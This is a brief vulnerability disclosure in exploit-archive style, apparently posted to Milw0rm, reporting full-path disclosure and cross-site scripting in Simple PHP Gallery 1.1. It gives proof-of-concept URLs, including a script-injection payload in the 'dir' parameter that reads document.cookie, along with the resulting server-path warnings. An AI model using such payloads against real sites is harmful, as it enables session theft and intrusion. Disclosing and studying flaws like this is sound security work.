+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: + + tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: + + tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: + + ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: + + ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: + + ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: + + ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: + + ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. + + ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. + + ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. + + tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. + + jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. + + ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. + + ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. + + iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; + + ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, + + jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, + + jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: + + iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii + + ;;.. ii;; + + .. + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +Credit by : Al7ejaz Hacker + + + +Script : Simple PHP Gallery 1.1 + +Impact : Cross site scripting & fullpath disclosure + + + + + +Fullpath disclosure : + + + +http://localhost/sp_index.php?dir=[Somthingwrong] + + + +Result + + + + + +Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10 + + + +Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11 + + + +Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147 + + + + + + + + + +Cross Site Scripting + + + + + + + +dir variable is not probrely verified and can be used to execute html and javascript code + + + +http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script> + + + +/Milw0rm + + + + + +in subject hot : Cross site scripting & fullpath disclosure ;) + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++